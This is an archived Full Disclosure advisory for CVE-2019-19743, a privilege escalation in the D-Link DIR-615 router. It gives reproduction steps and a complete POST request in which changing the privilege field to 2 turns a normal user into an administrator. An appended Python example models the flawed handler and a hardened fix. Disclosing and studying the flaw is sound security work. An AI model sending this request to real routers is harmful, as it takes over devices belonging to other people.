D-Link DIR-615 — Vertical Privilege Escalation

Related Vulnerabilities: CVE-2019-19743  
                							

                <!--X-Body-Begin-->
<!--X-User-Header-->
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">D-Link DIR-615 — Vertical Privilege Escalation</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->


<em>From</em>: Sanyam Chawla &lt;infosecsanyam () gmail com&gt;


<em>Date</em>: Mon, 16 Dec 2019 20:37:39 +0530


<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;">######################################################################################
# Exploit Title: D-Link DIR-615 — Vertical Privilege Escalation
# Date: 10.12.2019
# Exploit Author: Sanyam Chawla
# Vendor Homepage: <a rel="nofollow" href="http://www.dlink.co.in">http://www.dlink.co.in</a>
# Category: Hardware (Wi-Fi Router)
# Hardware Link: <a rel="nofollow" href="http://www.dlink.co.in/products/?pid=678">http://www.dlink.co.in/products/?pid=678</a>
# Hardware Version: T1
# Firmware Version: 20.07
# Tested on: Windows 10 and Kali Linux
# CVE: CVE-2019-19743
#######################################################################################


Reproduction Steps:

   1. Log in to your Wi-Fi router gateway with normal user credentials [i.e.
   <a rel="nofollow" href="http://192.168.0.1">http://192.168.0.1</a>]
   2. Go to the Maintenance page and click on Admin on the left panel.
   3. There is an option to create a user and by default, it shows only
   user accounts.
   &lt;<a rel="nofollow" href="https://1.bp.blogspot.com/-f-MOwxhgrRI/XfUZSszN8TI/AAAAAAAAFb8/v2193GabEVYOO_Ax89FPrBymNTxXc32_wCLcBGAsYHQ/s1600/1.PNG">https://1.bp.blogspot.com/-f-MOwxhgrRI/XfUZSszN8TI/AAAAAAAAFb8/v2193GabEVYOO_Ax89FPrBymNTxXc32_wCLcBGAsYHQ/s1600/1.PNG</a>&gt;
   4. Create an account with a name (i.e. ptguy) and change the privileges
   from user to root (admin) by changing the privilege id (1 to 2) with Burp Suite.


Privilege Escalation POST Request

POST /form2userconfig.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Origin: <a rel="nofollow" href="http://192.168.0.1">http://192.168.0.1</a>
Connection: close
Referer: <a rel="nofollow" href="http://192.168.0.1/userconfig.htm">http://192.168.0.1/userconfig.htm</a>
Cookie: SessionID=
Upgrade-Insecure-Requests: 1

username=ptguy&amp;*privilege=2*&amp;newpass=pentesting&amp;confpass=pentesting&amp;adduser=Add&amp;hiddenpass=&amp;submit.htm%3Fuserconfig.htm=Send

   5. Now log in with the newly created root (ptguy) user. You have all
   administrator rights.


Please let me know if any other information is required from my side for this
vulnerability.


Best Regards,

Sanyam Chawla

_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives &amp; RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a></pre>
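<p>The flaw from the defender's side, as an added example that is neither the author's nor D-Link's code: a hypothetical Python model of an add-user handler that trusts the client-supplied privilege id (the behaviour the advisory reports), beside a hardened version that takes the caller's privilege from the server-side session and refuses any requested privilege above it. The session store, account table and session ids are constructed; the form body is the advisory's request body with the author's emphasis asterisks removed.</p>

```python
from urllib.parse import parse_qs

USER, ADMIN = 1, 2  # privilege ids as the DIR-615 form uses them: 1 = user, 2 = root/admin

# Constructed server-side session store (SessionID -> (username, privilege))
# and account table; hypothetical, not the router's real data structures.
SESSIONS = {"sess-user": ("normaluser", USER), "sess-admin": ("admin", ADMIN)}
ACCOUNTS = {"admin": ADMIN, "normaluser": USER}

# The advisory's request body, with the author's emphasis asterisks removed.
ESCALATION_BODY = ("username=ptguy&privilege=2&newpass=pentesting&confpass=pentesting"
                   "&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send")


def add_user_vulnerable(session_id, body, accounts):
    """Hypothetical model of the reported flaw: the new account's privilege id
    is read straight from the client-supplied form, so any logged-in user can
    create a root account. Not D-Link's code."""
    if session_id not in SESSIONS:
        return "401 not logged in"
    form = parse_qs(body)
    name = form["username"][0]
    priv = int(form.get("privilege", [str(USER)])[0])  # trusts the client
    if form["newpass"][0] != form["confpass"][0]:
        return "400 passwords differ"
    accounts[name] = priv
    return "200 created"


def add_user_hardened(session_id, body, accounts):
    """Hardened form: the caller's privilege comes from the server-side session,
    and the requested privilege may never exceed it."""
    if session_id not in SESSIONS:
        return "401 not logged in"
    _, caller_priv = SESSIONS[session_id]
    form = parse_qs(body)
    name = form.get("username", [""])[0]
    if not name or name in accounts:
        return "400 bad username"
    priv = form.get("privilege", [str(USER)])[0]
    if priv not in (str(USER), str(ADMIN)):
        return "400 bad privilege"
    priv = int(priv)
    # Authorization is decided by the session, not the form field. A stricter
    # deployment would additionally require caller_priv == ADMIN to add anyone.
    if priv > caller_priv:
        return "403 forbidden"
    if form.get("newpass", [""])[0] != form.get("confpass", [""])[0]:
        return "400 passwords differ"
    accounts[name] = priv
    return "200 created"
```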
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->


<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<p>